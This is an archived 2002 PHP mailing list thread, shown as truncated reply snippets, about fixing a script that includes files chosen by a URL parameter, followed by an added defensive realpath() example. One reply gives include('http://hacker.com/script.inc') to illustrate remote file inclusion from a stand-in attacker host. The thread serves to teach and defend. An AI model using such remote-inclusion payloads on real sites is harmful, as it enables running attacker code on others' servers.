RE: [PHP] Umm... Uh-oh

2002-10-04 Thread John W. Holmes
to include files based on something passed in the url.

---John Holmes...

> -Original Message-
> From: John Wards [mailto:[EMAIL PROTECTED]]
> Sent: Friday, October 04, 2002 6:14 AM
> To: Stas Maximov
> Cc: PHP General
> Subject: Re: [PHP] Umm... Uh-oh
>
> ah never

Re: [PHP] Umm... Uh-oh

2002-10-04 Thread John Wards
, but NOT accessible via http.
>
> HTH, Stas
>
> - Original Message -
> From: "John Wards" <[EMAIL PROTECTED]>
> To: "PHP" <[EMAIL PROTECTED]>
> Sent: Friday, October 04, 2002 10:58 AM
> Subject: Re: [PHP] Umm... Uh-oh
>
> > erm..

Re: [PHP] Umm... Uh-oh

2002-10-04 Thread Stas Maximov
<[EMAIL PROTECTED]>
To: "PHP" <[EMAIL PROTECTED]>
Sent: Friday, October 04, 2002 10:58 AM
Subject: Re: [PHP] Umm... Uh-oh

erm..would that allow hackers access? Say I have a database include file would hackers be able to get access to my database like this? (include('http

Re: [PHP] Umm... Uh-oh

2002-10-04 Thread Marek Kilimajer
That would not help you if you include files based on unchecked user input.

Justin French wrote:

>all my include files are *.inc, and I have a .htaccess file that makes
>apache refuse to serve those files directly thru http.
>
>Justin
>
>
>on 04/10/02 7:58 PM, John Wards ([EMAIL PROTECTED]) wrot

Re: [PHP] Umm... Uh-oh

2002-10-04 Thread John Wards
so as my files are all .php I would be okay from an external hacking attempt? I don't have any worry about internal as I am on a dedicated server

John

On Friday 04 Oct 2002 11:02 am, Justin French wrote:
> all my include files are *.inc, and I have a .htaccess file that makes
> apache refuse to

Re: [PHP] Umm... Uh-oh

2002-10-04 Thread Justin French
all my include files are *.inc, and I have a .htaccess file that makes apache refuse to serve those files directly thru http.

Justin

on 04/10/02 7:58 PM, John Wards ([EMAIL PROTECTED]) wrote:

> erm..would that allow hackers access? Say I have a database include file
> would hackers be able

Re: [PHP] Umm... Uh-oh

2002-10-04 Thread John Wards
erm..would that allow hackers access? Say I have a database include file would hackers be able to get access to my database like this? (include('http://mysite.com/datainc.php');)

I hope bloody not!!! if so how on earth do I get round that!

John

On Friday 04 Oct 2002 10:52 am, Marek Kilimaj

Re: [PHP] Umm... Uh-oh

2002-10-04 Thread Marek Kilimajer
Use realpath() to check the path. I also suspect your script is vulnerable to cross-site includes (include('http://hacker.com/script.inc');)

Rick Beckman wrote:

>Okay, I was mistaken... There is a gaping security hole in my simple li'l
>script... How do I modify it to only accept files from a

[PHP] Umm... Uh-oh

2002-10-04 Thread Rick Beckman
Okay, I was mistaken... There is a gaping security hole in my simple li'l script... How do I modify it to only accept files from a certain path? I want the url format to be script.php?call=1 where "1" is the called file in the /includes/ directory. Just when I get optimistic I leave the entire sys
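
An added example, not part of the thread: one way to apply the realpath() check suggested above to the script.php?call=1 layout from the original question. The helper name resolve_include(), the .php suffix on included files and the __DIR__/includes location are assumptions made for illustration.

```php
<?php
// Added example, not code from the thread. Assumptions: includes live in
// __DIR__/includes and end in .php; resolve_include() is a hypothetical helper.

/**
 * Map the untrusted ?call= value to a file inside $baseDir, or return null.
 */
function resolve_include(string $call, string $baseDir): ?string
{
    // Allowlist the name itself: no slashes, dots, colons or NUL bytes, so
    // "../x", "http://host/x" and "php://input" never reach the filesystem.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $call)) {
        return null;
    }

    $base = realpath($baseDir);
    if ($base === false) {
        return null; // base directory is missing
    }

    // realpath() resolves symlinks and ".." and returns false when the file
    // does not exist, so $target is the path that would really be loaded.
    $target = realpath($base . DIRECTORY_SEPARATOR . $call . '.php');
    if ($target === false || !is_file($target)) {
        return null;
    }

    // Containment check: compare against the base plus a trailing separator
    // so "/includes_evil/1.php" does not pass as being under "/includes".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// ?call[]=x arrives as an array, so accept strings only.
$call = $_GET['call'] ?? '';
$file = is_string($call) ? resolve_include($call, __DIR__ . '/includes') : null;
if ($file === null) {
    http_response_code(404);
    exit('Not found');
}
include $file;
```

The name allowlist and the realpath() containment check are independent layers: the first rejects URL and traversal syntax outright, the second catches symlinks inside the includes directory that point elsewhere.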